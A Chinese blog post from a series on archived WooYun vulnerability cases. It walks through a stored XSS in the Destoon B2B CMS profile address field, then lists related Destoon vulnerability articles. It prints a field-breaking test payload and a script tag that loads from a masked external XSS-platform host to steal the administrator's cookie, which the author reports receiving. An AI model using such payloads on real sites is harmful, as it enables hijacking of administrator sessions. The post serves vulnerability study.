【漏洞学习——XSS】Destoon B2B网站管理系统存储xss

最新推荐文章于 2021-03-24 01:19:54 发布
最新推荐文章于 2021-03-24 01:19:54 发布
阅读量1k 收藏
点赞数
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84378815
版权

漏洞简介

Destoon B2B网站管理系统存储xss,可打后台cookie

我们在修改资料的地方插入xss

查看源代码- - 发现没有做任何的过滤

<td class="tr">
  <input type="text" size="40" name="post[address]" id="daddress" value="\">
  <script>alert(/xss/)</script>"/> 
  <span id="ddaddress" class="f_red">
  </span></td>
</tr>

我们既闭合value值,又成功地插入了xss

后台成功触发

因此我们继续,插入盗取cookie的xss代码
/><script src=http://**.**.**.**/RyjbQz8></script>

我们登录到后台查看,我们的xss平台已经收到管理的cookie了哈哈

 

参见:https://bugs.shuimugan.com/bug/view?bug_no=145897

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
destoon注入漏洞
qq_34862577的博客
02-28 2779
漏洞名称:destoon注入漏洞漏洞等级: 高危披露时间:2017-03-22 08:59:13漏洞类型:Web-CMS漏洞漏洞描述:在php5.2下可以绕过waf,利用没有正确过滤的变量进行注入。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了该漏洞,云盾依然报告...
Destoon(B2B网站系统) 6.0 GBK 20171011.zip
05-24
Destoon(B2B网站系统)使用当前流行的PHP语言开发,以MySQL为数据库,采用B/S架构,MVC模式开发。融入了模型化、模板、缓存、AJAX、SEO等前沿技术。与同类产品相比,系统功能更加强大、使用更加简单、运行更加稳定、安全性更强,效率更高,用户体验更好。系统开源发布,便于二次开发、功能整合、个性修改。 Destoon 6.0 GBK 20171011 更新日志: [修复]手机版留言存在SQL注入漏洞;[修复]Kindeditor编辑器插入视频无法在手机版播放;[修复]分类设置了SEO信息没有优先显示;[修复]快钱支付接口无法支付成功;[修复]易宝支付错误信息未正确保存;[更新]常用支付接口申请地址;[更新]最新QQ视频匹配播放规则;[优化]Memcache服务无法连接时自动切换到文件缓存。
阿里云提示漏洞destoon变量覆盖导致延时注入
weixin_34060299的博客
08-18 272
出现漏洞 .../module/mall/my.inc.php .../backup/module/mall/my.inc.php 修复方法: my.inc.php里面所有的extract函数加上, EXTR_SKIP参数就可以 比如extract($item);修改成extract($item,EXTR_SKIP); ...
array_map php ord,Destoon最新全版本通杀SQL注入漏洞
weixin_33734087的博客
03-24 423
Author:Kavia/common.inc.php 64行:[php]if($_POST) $_POST = strip_sql($_POST);//strip_sql()过滤if($_GET) $_GET = strip_sql($_GET);if($_COOKIE) $_COOKIE = strip_sql($_COOKIE);.........if($_POST) extract($_P...
无意中发现destoon5商城处理订单时的一些bug
weixin_30776273的博客
08-29 92
最新的destoon5在商城的商品中加入了商品属性的功能,可以使用三个商品属性而在代码中用如“49-3-0-0”来标记所选择的的商品及属性,其中第一个数字是商品的id,后三个表示的是商品对应的属性值,而在处理订单时,我发现了一些问题:在生成订单后生成对应的商品评价数据时代码如下其中商品id直接对应$k,而从这个代码可以知道$k所对应的格式形如:49-3-0-0,而在商品评价数据表中插入时编程插...
(华科企业网站管理系统)hkqyglxt-含有存储XSS漏洞的源码包.rar
03-24
hkqyglxt-含有存储XSS漏洞的源码包,亲测真实有效,可用,如有侵权,请联系CSDN管理员删除即可
通过代码审计找出网站中的XSS漏洞实战
02-24
反向审计打蛇打七寸,说明在关键位置做事效率会更高,代码审计找出漏洞也是同理,因此笔者需要找出XSS关键的位置;对于目前的大多数Web应用来说,MVC模式是非常主流的一种形式,因此笔者这里将找到对应的控制器和模板...
奇安信安全扫描漏洞解决路径遍历和存储xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
dedecms 留言本 XSS 漏洞
收集盒 Book box
09-09 684
dedecms 的 0day 又出来了 呵呵。其实只是xss,结合下社工还是可以拿shell的 plus/guestbook/index.php >>>>function init() { document.write(\'Hacked by qing\');}win
Destoon被植木马 @include(PACK('H*','2F746D702F2E4943452D756E69782F30'));
xingnang2008的专栏
06-25 1295
暂无法确定,植入路径! 网站收录页面被指向波菜,但用浏览器,打开时提示403。应该代码中加入了判断浏览器header的代码。 在站内搜索到两个php文件,有代码写入 @include(PACK('H*','2F746D702F2E4943452D756E69782F30')); 用16进制转字符串后 2F746D702F2E4943452D756E69782F30 => /tmp/....
destoon php文件,Destoon 任意文件读取
weixin_32024145的博客
03-18 158
发布时间:2016-08-29公开时间:N/A漏洞类型:变量覆盖危害等级:高漏洞编号:xianzhi-2016-08-42442070测试版本:N/A漏洞详情include/remote.class.phpfunction construct($file, $savepath, $savename = '') {global $DT, $_userid;$this->file = strip...
存储xss实例分享---基于web靶机的织梦内容管理系统
永不垂头的博客
08-08 410
存储xss实例分享—基于web靶机的织梦内容管理系统 存储xss实例分享: ① 用御剑扫到管理员登录路径: http://192.168.1.105:800/DedeCmsV5.6-GBK-Final/uploads/dede/login.php ② 打开如下: ③ 用xss平台(可以多试几个平台) https://xss8.cc/xss.php?do=project&act=viewcode&ty=create&id=10604 ④ 登录 会员账号/密码:like/12
ThinkPHP V5.0.5漏洞_【权威发布】近日重点网络安全漏洞情况摘报
weixin_39669701的博客
10-29 207
网络安全大家好,小编近日将国内主流网络安全媒体发布的重要网络安全漏洞进行了梳理汇总,在这里分享给大家学习。让我们来共同提升网络安全防范意识吧。!01Xiaomi路由器存在输入验证错误高危漏洞Xiaomi router R3600是中国小米科技(Xiaomi)公司的一款无线路由器,该路由器存在输入验证错误高危漏洞,该漏洞源于set WAN6接口中的过滤器可以被绕过,导致远程代码执行,攻击者...
DESTOON从CSRF到GETSHELL
dfdhxb995397的博客
09-25 242
本文作者:薄荷糖微微凉 Destoon B2B网站管理系统是一套完善的B2B(电子商务)行业门户解决方案。系统基于PHP+MySQL开发,采用B/S架构,模板与程序分离,源码开放。模型化的开发思路,可扩展或删除任何功能;创新的缓存技术与数据库设计,可负载不低于百万级别数据容量及访问。系统被数万b2b网站所采用,同时,也有数量巨大的开发者利用该系统进行二次开发。 0x 01受影响版本...
guestbook.php注入,Destoon 6.0 guestbook.php 通用SQL注入漏洞
weixin_32827751的博客
03-09 475
来源: https://www.leavesongs.com/PENETRATION/destoon-v6-0-sql-injection.html作者: phithon刚看到今天发布了Destoon 6.0 2017-01-09 更新,用我在【代码审计】小密圈里说过的方法,瞬间找到修复的一处SQL注入漏洞。用中午的20分钟,小小地分析一下。我们先看看diff(左新右老):mobile/guest...
destoon 后台写入webshell
weixin_34104341的博客
11-21 685
2019独角兽企业重金招聘Python工程师标准>>> ...
如何查找网站漏洞文件任意查看漏洞详情与利用
热门推荐
网站安全专家
07-17 1万+
在对网站程序代码的安全检测当中,网站文件任意查看漏洞在整个网站安全报告中属于比较高危的网站漏洞,一般网站里都会含有这种漏洞,尤其平台,商城,交互类的网站较多一些,像普通权限绕过漏洞,导致的就是可以查看到网站里的任何一个文件,甚至可以查看到网站的配置文件config.php conn.php等等。 我们SINE安全公司在对gitea开源程序代码进行网站安全检测的时候发现存在网站文件任意查看漏洞,没...
某CMS 任意文件读取漏洞分析
weixin_33859844的博客
06-02 1200
0x01 漏洞概述 74CMS是一套专业的人才招聘系统,复现此漏洞的版本号为:4.2.111。下载地址是:http://www.74cms.com/download/index.html 0x02 漏洞复现 发送一个构造好的POST请求: url: http://74cms.test/index.php?m=Home&c=Members&a=register post...
xss网站寻找xss漏洞
最新发布
08-29
在手工挖掘中,可以参考中提供的实践案例,通过快速找出网站中可能存在的XSS漏洞。工具挖掘可以使用一些专门用于漏洞扫描的工具,例如permeate渗透测试系统。中提供了一个示例URL,你可以通过访问该网站来进行XSS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值